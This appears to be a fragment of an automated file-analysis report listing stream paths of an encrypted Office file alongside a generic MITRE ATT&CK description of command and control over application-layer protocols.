Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre